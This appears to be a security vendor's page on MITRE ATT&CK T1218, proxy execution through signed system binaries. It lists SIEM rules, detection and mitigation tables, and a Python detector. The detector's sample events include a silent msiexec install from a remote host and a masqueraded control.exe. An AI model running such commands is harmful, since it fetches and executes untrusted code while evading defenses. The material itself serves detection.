T1218: System Binary Proxy Execution
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
sap_suspicious_user_activity: PT-CR-245: SAPASABAP_GW_Rfcexec_call: RFCEXEC run
mitre_attck_defense_evasion: PT-CR-1864: Proxy_Execution_via_WorkFolders: An attacker can launch a masqueraded control.exe file from the current working directory using WorkFolders in order to bypass security measures
mitre_attck_defense_evasion: PT-CR-604: Microsoft_Teams_AWL_Bypass: An attempt to bypass application-start restrictions by using update.exe (a binary to update installed NuGet/Squirrel packages included in the Microsoft Teams installation)
mitre_attck_defense_evasion: PT-CR-650: Suspicious_File_Created_by_Legal_Process: Detects creation of suspicious files by legitimate processes
unix_mitre_attck_defense_evasion: PT-CR-1674: Unix_Shell_Command_via_GTFOBINS: An interactive system shell was created using a GTFOBins utility. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
Detection
| ID | Data source and component | Description |
|---|---|---|
| DS0011 | Module: Module Load | Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. |
| DS0029 | Network Traffic: Network Connection Creation | Monitor for newly constructed network connections that are sent or received by untrusted hosts. |
| DS0009 | Process: Process Creation | Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. |
| DS0009 | Process: OS API Execution | Monitor for API calls that bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. |
| DS0024 | Windows Registry: Windows Registry Key Modification | Monitor for changes made to Windows Registry keys and/or values that may forge credential materials that can be used to gain access to web applications or Internet services. |
| DS0017 | Command: Command Execution | Monitor executed commands and arguments that may forge credential materials that can be used to gain access to web applications or Internet services. |
| DS0022 | File: File Creation | Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity. |
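The DS0009 guidance above (compare invocations of signed binaries against known-good arguments; treat msiexec.exe fetching an MSI from the Internet as suspicious) and the PT-CR-1864 WorkFolders case can be turned into simple detection logic. The example below is added here and is not MaxPatrol SIEM or MITRE code; the event field names, the known-good baseline and the sample events are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process creation events (field names are assumed, not a real schema).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Users\bob\Downloads\setup.msi /qn"},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /q /i http://203.0.113.10/pkg.msi"},
    {"image": r"C:\Windows\System32\control.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"control.exe"},
    {"image": r"C:\Users\bob\Downloads\control.exe", "parent": r"C:\Windows\System32\WorkFolders.exe",
     "cmdline": r"control.exe"},
]

# Directories where the genuine Microsoft-signed copies of these binaries live.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Hypothetical known-good argument baseline per signed binary; in practice built from history.
KNOWN_GOOD = {
    "msiexec.exe": [re.compile(r"^msiexec\.exe\s+/i\s+[a-z]:\\", re.I)],
    "control.exe": [re.compile(r"^control\.exe(\s+\S+\.cpl)?$", re.I)],
}
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def in_trusted_dir(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)

def evaluate(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules that fire on one process creation event."""
    hits: List[str] = []
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    # Rule 1: msiexec.exe given an Internet URL as its package source.
    if image == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_msi")
    # Rule 2: WorkFolders.exe starting a control.exe that is not the System32 one.
    if parent == "workfolders.exe" and image == "control.exe" and not in_trusted_dir(ev["image"]):
        hits.append("workfolders_masqueraded_control")
    # Rule 3: a baselined signed binary invoked with arguments outside its known-good set.
    patterns = KNOWN_GOOD.get(image)
    if patterns and not any(p.search(cmd) for p in patterns):
        hits.append("baseline_deviation")
    return hits

def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index to fired rules for every event that triggered at least one rule."""
    results: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            results[i] = hits
    return results
```

Rule 3 fires together with rule 1 on the second event because its argument order also departs from the baseline; correlating such overlapping hits is the point of the "compare with prior history" guidance.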
Mitigation
| ID | Name | Description |
|---|---|---|
| M1042 | Disable or Remove Feature or Program | Many native binaries may not be necessary within a given environment. |
| M1050 | Exploit Protection | Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using trusted binaries to bypass application control. |
| M1037 | Filter Network Traffic | Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. |
| M1026 | Privileged Account Management | Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use them, to lessen the opportunities for malicious usage. |
| M1038 | Execution Prevention | Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network. |
| M1021 | Restrict Web-Based Content | Restrict use of certain websites, block downloads/attachments, block JavaScript, restrict browser extensions, etc. |